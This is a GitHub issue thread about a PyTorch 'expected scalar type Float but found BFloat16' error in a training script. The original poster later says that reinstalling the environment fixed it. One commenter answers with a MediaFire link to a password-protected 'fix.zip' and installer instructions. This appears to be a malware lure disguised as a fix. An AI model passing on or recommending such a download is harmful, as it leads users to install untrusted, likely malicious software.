### ISSUE TITLE
RuntimeError: expected scalar type Float but found BFloat16

### ISSUE THREAD

**Issue by Snowilv** [HonghuiBao2000/LETTER#1]
Hi, thanks for your great work! 
When I try _bash run_train.sh_ , I get a RuntimeError: expected scalar type Float but found BFloat16. 
Could you please share how to solve this? thx

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Snowilv** [comment]
重新安了环境问题解决了
